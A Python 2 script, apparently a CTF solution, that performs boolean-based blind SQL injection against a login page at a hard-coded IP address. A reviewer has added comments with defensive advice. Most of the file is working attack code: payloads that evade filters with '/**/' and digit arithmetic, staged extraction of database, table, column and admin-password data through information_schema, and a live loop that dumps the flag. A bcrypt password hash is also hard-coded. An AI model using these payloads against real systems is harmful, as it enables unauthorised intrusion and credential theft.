#! /usr/bin/env python2
# NOTE(review): this paste arrived with its line breaks collapsed; the layout
# below is reconstructed from syntax. The nesting inside len_with_expression()
# is the most plausible reading, not a certainty.
#
# What this file is: a Python 2 script that repeatedly POSTs to one login
# endpoint and reads a yes/no answer from whether the response body contains a
# marker string ('logged user', or 'User exist' in some disabled stages). Each
# request asks one boolean question about the database, i.e. boolean-based
# blind SQL injection. It looks like a CTF solution (the table is named 'fl4g'
# and the only live stage reads a column named 'flag') -- TODO confirm.
#
# Defensive reading of what the script shows:
#   * The server presumably builds its login query by string concatenation and
#     filters individual characters. The script sidesteps such filtering with
#     equivalent SQL syntax ('/**/' for spaces, arithmetic instead of the
#     digit '0'), which is why character blacklists are not a fix; bound
#     parameters / prepared statements are.
#   * Signals visible in these requests that a login endpoint can alert on:
#     a username consisting of a single backslash, '/**/' sequences,
#     'ascii(mid(' or 'information_schema' inside the password field, and up
#     to 100 POSTs per character position (len(string.printable)) from one
#     client. Rate limiting on the endpoint slows this kind of extraction.
#   * Returning the same response for every failed login removes the
#     true/false oracle that the script depends on.

# `commands` is imported but never used in the visible code.
import requests as req, string, re, commands

# Hand-recorded values, apparently results of earlier stages of the script.
# Of these, the live code below reads only `db_name` and
# `custom_string_printable`; `db_len`, `admin_password_len` and
# `table_name_len_1` are referenced only by the commented-out stages.
db_len = 7
# db_name = 'loginv3'
db_name = ''  # reused below as the accumulator for whatever is being extracted
admin_password_len = 60
table_in_db = 3
table_name_len_1 = 4
table_name_len_2 = 5
table_name = 'fl4g'
columns_in_table = 5
col_1_len = 2
col_2_len = 4
col_3_len = 8
col_4_len = 8
col_5_len = 4
col_1 = 'flag'
col_2 = 'name'
col_3 = 'username'
col_4 = 'password'
col_5 = 'admin'
total_rows = 1  # :|
id = '1'  # shadows the builtin id() at module level
name = 'admin'
username = 'admin'
# bcrypt-format hash ($2y$, cost 10) hard-coded in a public paste. If it
# belongs to a real account, the credential should be treated as exposed.
password = '$2y$10$KpEcR/n54ZlX1OeKiLKwY.AfWXSXjUzL.Fk0CVtzsfYpYizThN3Qq'
admin = '1'
# Code points of every character in string.printable, in that module's order.
custom_string_printable = [ord(i) for i in string.printable]


# Empty placeholder class; nothing in the visible code instantiates it.
class pass_empty(object):
    pass


def encode_payload_with_space(payload):
    """Return `payload` with every space replaced by the SQL comment '/**/'.

    Presumably the target rejects literal spaces -- the filter itself is not
    shown here. A string without spaces is returned unchanged.
    """
    if ' ' in payload:
        payload = payload.replace(' ', '/**/')
    return payload


def send_dirty_payload(payload):
    """POST one login attempt and return the raw response body.

    The form fields are 'username' (a single backslash) and 'pass' (the
    payload after encode_payload_with_space). Presumably the backslash escapes
    the quote that closes the username literal in the server's query, so the
    'pass' value is parsed as SQL -- TODO confirm against the server code.
    """
    # Plain HTTP, and no timeout argument: requests waits indefinitely if the
    # server stops answering.
    resp = req.post('http://45.77.241.3/Loginv3/login.php',
                    data={'username': '\\', 'pass': encode_payload_with_space(payload)}).content
    return resp


def len_with_expression(list):
    """Return one string per item, rewriting items whose digits include '0'.

    Items without a '0' are returned as str(item). A non-three-digit item
    containing '0' becomes '<item + 1> - 1' (50 -> '51 - 1'). A three-digit
    item containing '0' becomes '99 + <counter>', where the counter counts
    such items seen so far; that equals the item only when those items arrive
    consecutively starting at 100. Whenever the counter's own digits contain
    '10' the fixed text '99 + 9 + 1' is emitted instead.

    Presumably the target rejects the character '0' -- not shown here.
    The parameter name shadows the builtin `list` inside this function.
    """
    length = []
    i = 1  # running count of three-digit items that contained a '0'
    for k, v in enumerate(list):
        v = str(v)
        if '0' in v:
            if re.findall(r'^\d{3}$', v):
                if '10' in str(i):
                    # avoids writing the counter value 10, which has a '0'
                    length.append('{} + {}'.format(99, '9 + 1'))
                else:
                    length.append('{} + {}'.format(99, i))
                i += 1
            else:
                length.append('{} - 1'.format(str(int(v) + 1)))
            continue
        length.append(v)
    return length


# Everything from here to the "Dump 1 row" stage is disabled. The bare
# triple-quoted strings are no-op statements used as section headings, and
# the commented-out code is kept as the author left it.

""" Check db length """
# for k, v in enumerate(len_with_expression(xrange(100))):
#     payload = 'or length(database())={}#'.format(v)
#     if 'logged user' in send_dirty_payload(payload):
#         print k, 'logged user'
#         print '{}\ndb len: {}'.format('-' * 20, k)
#         break
#     print k, 'incorrect'

""" Get db name """
# for i in xrange(1, db_len + 1):
#     for k, v in enumerate(len_with_expression(custom_string_printable)):
#         payload = 'or ascii(mid(database(),{},1))={}#'.format(i, v)
#         if 'logged user' in send_dirty_payload(payload):
#             db_name += chr(eval(v))
#             print chr(eval(v)), 'logged user'
#             print '{}\ndb name: {}'.format('-' * 20, db_name)
#             break
#         # print payload
#         print chr(eval(v)), 'incorrect'

""" Check admin's password length """
# for k, v in enumerate(len_with_expression(xrange(100))):
#     payload = 'or length((select password from users limit 1))={}#'.format(v)
#     if 'logged user' in send_dirty_payload(payload):
#         print k, 'logged user'
#         print '{}\nadmin\'s password len: {}'.format('-' * 20, k)
#         break
#     print k, 'incorrect'

""" Get admin's password """
# list_admin_password_len = [i for i in xrange(1, admin_password_len + 1)]
# for i in len_with_expression(list_admin_password_len):
#     for k, v in enumerate(len_with_expression(custom_string_printable)):
#         payload = 'or ascii(mid((select password from users limit 1),{},1))={}#'.format(i, v)
#         if 'User exist' in send_dirty_payload(payload):
#             db_name += chr(eval(v))
#             print chr(eval(v)), send_dirty_payload(payload)
#             print '{}\nadmin\'s password: {}'.format('-' * 20, db_name)
#             break
#         # print payload
#         print v, chr(eval(v)), send_dirty_payload(payload)

""" Count tables in db 'ctf' """
# for k, v in enumerate(len_with_expression(xrange(100))):
#     payload = 'or (select count(table_name) from information_schema.tables where table_schema=database())={}#'.format(v)
#     if 'logged user' in send_dirty_payload(payload):
#         print k, 'logged user'
#         print '{}\ntotal tables in \'ctf\': {}'.format('-' * 20, k)
#         break
#     print k, 'incorrect'

""" Check table_name's length """
# for k, v in enumerate(len_with_expression(xrange(100))):
#     payload = 'or length((select table_name from information_schema.tables where table_schema=database() limit 1,1))={}#'.format(
#         v)
#     if 'logged user' in send_dirty_payload(payload):
#         print k, 'logged user'
#         print '{}\ntable_name\'s length: {}'.format('-' * 20, k)
#         break
#     # print payload
#     print k, 'incorrect'

""" List table in db 'ctf' (fix) # """
# list_table_name_1_len = [i for i in xrange(1, table_name_len_1 + 1)]
# for i in len_with_expression(list_table_name_1_len):
#     for k, v in enumerate(len_with_expression(custom_string_printable)):
#         payload = 'or ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1),{},1))={}#'.format(
#             i, v)
#         if 'logged user' in send_dirty_payload(payload):
#             db_name += chr(eval(v))
#             print chr(eval(v)), 'logged user'
#             print '{}\ntable_name: {}'.format('-' * 20, db_name)
#             break
#         # print payload
#         print chr(eval(v)), 'incorrect'

""" Count columns in db 'ctf' """
# for k, v in enumerate(len_with_expression(xrange(1, 100))):
#     payload = 'or (select count(column_name) from information_schema.columns where table_schema=database() limit 1)={}#'.format(
#         v)
#     if 'logged user' in send_dirty_payload(payload):
#         print v, 'logged user'
#         print '{}\ntotal tables in \'ctf\': {}'.format('-' * 20, v)
#         break
#     print v, 'incorrect'

""" Check column_name's length """
# list_columns_in_table = [i for i in xrange(1, table_name_len_1)]
# for k, v in enumerate(len_with_expression(xrange(1, 100 + 1))):
#     payload = 'or length((select * from (select column_name from information_schema.columns where table_schema=database() limit 1)x limit 1))={}#'.format(
#         v)
#     if 'logged user' in send_dirty_payload(payload):
#         print v, 'logged user'
#         print '{}\ncolumn {}\'s name length: {}'.format('-' * 20, k, v)
#         break
#     print v, 'incorrect'
# for i in len_with_expression(list_columns_in_table):
#     for k, v in enumerate(len_with_expression(xrange(1, 100 + 1))):
#         payload = 'or length((select column_name from information_schema.columns where table_schema=database() limit {},1))={}#'.format(
#             i, v)
#         if 'User exist' in send_dirty_payload(payload):
#             print v, 'logged user'
#             print '{}\ncolumn {}\'s name length: {}'.format('-' * 20, int(i) + 1, v)
#             break
#         # print payload
#         print v, 'incorrect'

""" Get col name """
# for i in xrange(1, 100 + 1):
#     for k, v in enumerate(len_with_expression(custom_string_printable)):
#         payload = 'or ascii(mid((select column_name from information_schema.columns where table_schema=database() limit 1,1),{},1))={}#'.format(
#             i, v)
#         if 'logged user' in send_dirty_payload(payload):
#             db_name += chr(eval(v))
#             print chr(eval(v)), 'logged user'
#             print '{}\ncol name: {}'.format('-' * 20, db_name)
#             break
#         # print payload
#         print chr(eval(v)), 'incorrect'

""" Count id rows """
# for k, v in enumerate(len_with_expression(xrange(1, 101))):
#     payload = 'or (select count(pass) from fl4g)={}#'.format(
#         v)
#     if 'logged user' in send_dirty_payload(payload):
#         print v, 'logged user'
#         print '{}\ntotal rows in \'users\': {}'.format('-' * 20, v)
#         break
#     print v, 'incorrect'

""" Dump 1 row :| """
# The only stage that actually runs. For each character position in the given
# range it tries every candidate code point until the response contains
# 'logged user', then appends that character to db_name.
for i in xrange(2640, 2700):  # position() mysql
    for k, v in enumerate(len_with_expression(custom_string_printable)):
        payload = 'or ascii(mid((select flag from fl4g),{},1))={}#'.format(
            i, v)
        if 'logged user' in send_dirty_payload(payload):
            # eval() only sees strings built locally by len_with_expression
            # (digits, '+', '-'), never server data; int arithmetic would
            # avoid eval altogether.
            db_name += chr(eval(v))
            print chr(eval(v)), 'logged user'
            print '{}\nflag: {}'.format('-' * 20, db_name)
            break
        # print payload
        print chr(eval(v)), 'incorrect'

""" dbg """
# for k, v in enumerate(len_with_expression(custom_string_printable)):
#     print v, eval(v)
# test = [i for i in xrange(1, admin_password_len + 1)]
# print len_with_expression(test)